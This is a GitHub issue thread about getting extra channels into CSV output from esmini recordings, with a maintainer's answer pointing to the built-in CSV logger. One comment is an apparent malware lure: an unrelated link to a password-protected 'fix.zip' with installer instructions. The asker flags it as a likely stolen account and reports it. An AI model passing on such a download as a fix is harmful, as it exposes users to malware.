### ISSUE TITLE
Using DLL in Python for .csv Recording

### ISSUE THREAD

**Issue by ufukbolat1** [esmini/esmini#610]
Hi,

I'm recording a .dat file using the command 
`se.SE_Init(b"example_scenario.xosc", 1, 1, 0, 1)`. 
When I later convert this to CSV using dat2csv.py, some channels are missing.

For example, when I use dat2csv, I can't access the following channels:

- Bounding box x-y-z, length-width-height
- vel_X, vel_Y, vel_Z
- acc_X, acc_Y, acc_Z
- Distance_Travelled_Along_Road_Segment
- Lateral_Distance_Lane
- lane_id
- lane_offset
- World_Heading_Angle [rad]
- Heading, etc.

How can I include these channels? I want to directly get the recording into a CSV file. Is there any other way to achieve this besides using argument lists?

Thanks already.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ufukbolat1** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

 I think his account got stolen or maybe it is an old account. reported already.

**Comment by eknabevcc** [comment]
Short answer is: No.

But I can add some info:
 
There is a second way to create CSV file, using the separate [CSV_logging capability](https://esmini.github.io/#_csv_logger).

Example:
`./bin/esmini --window 60 60 800 400 --osc ./resources/xosc/cut-in.xosc --csv_logger log.csv`

Not configurable, but the resulting `log.csv` file includes more data than csv converted from dat file. 

Long term this would be a great feature, to configure dat/csv output. There are some ongoing work on dat format that will make such feature possible in future. But it's not prioritized and planned for yet.

Finally: The CSV_Logger class can of course be extended in the code with custom content. But it's not very straight forward, hence I wouldn't encourage to do it.

**Comment by ufukbolat1** [comment]
Enough information for me. Thank you.
